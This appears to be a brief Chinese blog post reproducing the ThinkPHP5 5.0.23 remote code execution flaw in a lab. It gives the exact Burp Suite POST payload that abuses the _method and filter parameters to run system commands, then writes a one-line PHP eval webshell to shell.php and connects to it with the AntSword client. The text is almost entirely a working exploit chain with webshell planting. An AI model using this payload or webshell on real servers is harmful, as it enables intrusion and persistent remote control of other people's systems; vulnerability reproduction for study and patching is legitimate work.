复现ThinkPHP5 5.0.23远程代码执行漏洞
burpsuite进行抓包,修改传参方式为Post,url后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。
尝试写入phpinfo
检测写入成功
写入一句话木马:echo ‘<?php eval($_POST[aaa]); ?>’ > shell.php
用蚁剑来进行连接
至此漏洞复现完毕。
复现ThinkPHP5 5.0.23远程代码执行漏洞
最新推荐文章于 2024-09-08 18:53:34 发布